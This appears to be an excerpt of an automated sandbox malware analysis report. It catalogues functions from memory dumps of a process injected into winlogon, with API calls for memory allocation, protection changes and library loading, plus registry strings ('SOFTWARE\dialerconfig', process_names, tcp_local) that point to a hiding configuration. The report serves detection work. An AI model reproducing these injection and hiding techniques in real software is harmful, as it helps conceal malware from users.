197 225dc64554f 191->197 192->191 195 225dc645554-225dc645561 192->195 202 225dc645563 195->202 203 225dc645564-225dc6455b9 call 225dc6485c0 195->203 196->197 197->195 198->185 207 225dc6454d2 199->207 208 225dc6454d0 199->208 200->188 201->185 202->203 210 225dc6455bb-225dc6455c3 203->210 211 225dc6455c8-225dc645661 call 225dc644510 call 225dc644470 VirtualProtect 203->211 207->184 208->185 216 225dc645671-225dc6456d1 211->216 217 225dc645663-225dc645668 GetLastError 211->217 216->140 217->216
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                              • Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
                                                              • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                              • Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00
                                                              Function 00000225DC6439E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocQuery
                                                              • String ID:
                                                              • API String ID: 31662377-0
                                                              • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
                                                              • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04
                                                              Function 00000225DC64328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240
                                                              Function 00000225DC644DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                              • String ID:
                                                              • API String ID: 3733156554-0
                                                              • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                              • Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
                                                              • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                              • Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00
                                                              Function 00000225DC61273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 265 225dc61273c-225dc6127a4 call 225dc6129d4 * 4 274 225dc6127aa-225dc6127ad 265->274 275 225dc6129b2 265->275 274->275 277 225dc6127b3-225dc6127b6 274->277 276 225dc6129b4-225dc6129d0 275->276 277->275 278 225dc6127bc-225dc6127bf 277->278 278->275 279 225dc6127c5-225dc6127e6 VirtualAlloc 278->279 279->275 280 225dc6127ec-225dc61280c 279->280 281 225dc612838-225dc61283f 280->281 282 225dc61280e-225dc612836 280->282 283 225dc612845-225dc612852 281->283 284 225dc6128df-225dc6128e6 281->284 282->281 282->282 283->284 285 225dc612858-225dc61286a LoadLibraryA 283->285 286 225dc6128ec-225dc612901 284->286 287 225dc612992-225dc6129b0 284->287 288 225dc6128ca-225dc6128d2 285->288 289 225dc61286c-225dc612878 285->289 286->287 290 225dc612907 286->290 287->276 288->285 292 225dc6128d4-225dc6128d9 288->292 291 225dc6128c5-225dc6128c8 289->291 294 225dc61290d-225dc612921 290->294 291->288 297 225dc61287a-225dc61287d 291->297 292->284 295 225dc612982-225dc61298c 294->295 296 225dc612923-225dc612934 294->296 295->287 295->294 298 225dc612936-225dc61293d 296->298 299 225dc61293f-225dc612943 296->299 300 225dc6128a7-225dc6128b7 297->300 301 225dc61287f-225dc6128a5 297->301 303 225dc612970-225dc612980 298->303 304 225dc612945-225dc61294b 299->304 305 225dc61294d-225dc612951 299->305 306 225dc6128ba-225dc6128c1 300->306 301->306 303->295 303->296 304->303 307 225dc612963-225dc612967 305->307 308 225dc612953-225dc612961 305->308 306->291 307->303 310 225dc612969-225dc61296c 307->310 308->303 310->303
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocLibraryLoadVirtual
                                                              • String ID:
                                                              • API String ID: 3550616410-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700
                                                              Function 00000225DC641ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                                • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
                                                              • Sleep.KERNEL32 ref: 00000225DC641AD7
                                                              • SleepEx.KERNELBASE ref: 00000225DC641ADD
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210
                                                              Function 00000225DC67273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 350 225dc67273c-225dc6727a4 call 225dc6729d4 * 4 359 225dc6727aa-225dc6727ad 350->359 360 225dc6729b2 350->360 359->360 362 225dc6727b3-225dc6727b6 359->362 361 225dc6729b4-225dc6729d0 360->361 362->360 363 225dc6727bc-225dc6727bf 362->363 363->360 364 225dc6727c5-225dc6727e6 VirtualAlloc 363->364 364->360 365 225dc6727ec-225dc67280c 364->365 366 225dc672838-225dc67283f 365->366 367 225dc67280e-225dc672836 365->367 368 225dc672845-225dc672852 366->368 369 225dc6728df-225dc6728e6 366->369 367->366 367->367 368->369 372 225dc672858-225dc67286a 368->372 370 225dc6728ec-225dc672901 369->370 371 225dc672992-225dc6729b0 369->371 370->371 373 225dc672907 370->373 371->361 379 225dc67286c-225dc672878 372->379 380 225dc6728ca-225dc6728d2 372->380 374 225dc67290d-225dc672921 373->374 377 225dc672923-225dc672934 374->377 378 225dc672982-225dc67298c 374->378 382 225dc672936-225dc67293d 377->382 383 225dc67293f-225dc672943 377->383 378->371 378->374 384 225dc6728c5-225dc6728c8 379->384 380->372 385 225dc6728d4-225dc6728d9 380->385 386 225dc672970-225dc672980 382->386 387 225dc672945-225dc67294b 383->387 388 225dc67294d-225dc672951 383->388 384->380 389 225dc67287a-225dc67287d 384->389 385->369 386->377 386->378 387->386 392 225dc672963-225dc672967 388->392 393 225dc672953-225dc672961 388->393 390 225dc6728a7-225dc6728b7 389->390 391 225dc67287f-225dc6728a5 389->391 394 225dc6728ba-225dc6728c1 390->394 391->394 392->386 395 225dc672969-225dc67296c 392->395 393->386 394->384 395->386
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700
                                                              Function 00000225DC6AD6CC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 397 225dc6ad6cc-225dc6ad6db 398 225dc6ad6dd-225dc6ad6e9 397->398 399 225dc6ad6eb-225dc6ad6fb 397->399 398->399 400 225dc6ad72e-225dc6ad739 call 225dc6ad6ac 398->400 401 225dc6ad712-225dc6ad72a HeapAlloc 399->401 407 225dc6ad73b-225dc6ad740 400->407 402 225dc6ad6fd-225dc6ad704 call 225dc6b0720 401->402 403 225dc6ad72c 401->403 402->400 409 225dc6ad706-225dc6ad710 call 225dc6ab85c 402->409 403->407 409->400 409->401
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
                                                              • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620

                                                              Non-executed Functions

                                                              Function 00000225DC642B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 02e5d621d8295eb5dd385e75f9606a0c78f62cf6da70878d64f9e7b1c174dd69
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: DCB1B47A21CE60A6EB968FEDC4487A973A5F744B8AF24D056DE0A53B94DF34CC41C340
                                                              Function 00000225DC6A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 8b409eee056ac65ba81e46254c59d85845063fb26c80b4bd130284c66f771075
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 96B1B37A290E60A2EBAADFADC44876963A5F744B86F24D016DE0DD3B95DF35CC81C340
                                                              Function 00000225DC647D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10
                                                              Function 00000225DC6A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 3b87e895a044953073a839ffa4b4feaece301703ffc135d08af6657be6a0d668
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 14317276205F9099EB64DFA4E8443EE73A1F78474AF448029DB4E57B94EF38C548CB10
                                                              Function 00000225DC64D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: f4e1f7a423249601853f9bf4c02ae152ed9a85bcd9bd447fde6e0ecec31a17ad
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 1531C73A218F90A6DB60DFA9E8443EE73A0F789755F504126EB9E43B94DF38C145CB00
                                                              Function 00000225DC6AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 4dbdfab791ea173b22a2c1feee1540d37dae8e72db698209205baee473c09c96
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 7631C93A214F90A6EB64CFA9E8443DE73A0F789756F504126EB9D43B54DF38C145CB00
                                                              Function 00000225DC647960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: d33dc497d620ec2850d47fa6d7599d0f75ef197f864d2f2ea1a1538dcd62ba05
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 54113026714F119AEF50CFE8E8593A833A4F719759F440E21DB6D467A4DF78C1A8C380
                                                              Function 00000225DC64DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction ID: 712154813c46b612020be7a143dde11e41283ee14142f5bab4be78c3f0fa479c
                                                              • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction Fuzzy Hash: 11511A26B0CBA0A9FB20DBBAE84879E7BA1F740BD5F148155EE5927B95DB38C001C700
                                                              Function 00000225DC6ADCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction ID: da0f1b53d22c38e7f028f1682345193667a56556076439a06e8349e4d1e3cf91
                                                              • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                              • Instruction Fuzzy Hash: 3C510926700FE0A9FB20DFBAA84879E7BA5F7447D5F248114EE58A7B95DB38C411C700
                                                              Function 00000225DC6236F0 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                              • Instruction ID: fee74b632db8da7adfbcef3e822971e4130eb4171b3ad2da802a4781d9383549
                                                              • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                              • Instruction Fuzzy Hash: EAF062B57146A49EDBA98F6CA80671A77E1F308381FD4C029D68983B04D33C8061CF04
                                                              Function 00000225DC6A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 545a197093dbf33f1111aaff3c94dd347963510d91bf182c1d2d2b3e49a62449
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 1B71FE7A314E24E6EB10DFAAE85869D33B5FB84B8AF109111DE4E97B69DF38C444C740
                                                              Function 00000225DC6412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: fb1b484c7ebee393b1b53cdd5cd81ac2c1ca147a5507fda1b24fca473b782784
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 46515E7A214F9496EB64CFAAE54836A77A1F789F9AF148124DF4A07B58DF3CC045C700
                                                              Function 00000225DC6A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: d2d635d82ad37731a82d28168a5eda6b08545a77464cd3cb2b7161adfafd8aad
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 22516C7A200F94DAEB54CFAAE54835A77A6F789F9AF148124DE4A47728DF3CC049C700
                                                              Function 00000225DC641D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
